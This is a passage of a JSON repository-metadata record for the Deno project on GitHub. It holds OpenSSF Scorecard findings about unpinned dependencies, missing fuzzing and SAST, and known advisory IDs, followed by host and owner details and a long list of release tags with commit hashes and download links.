.github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.00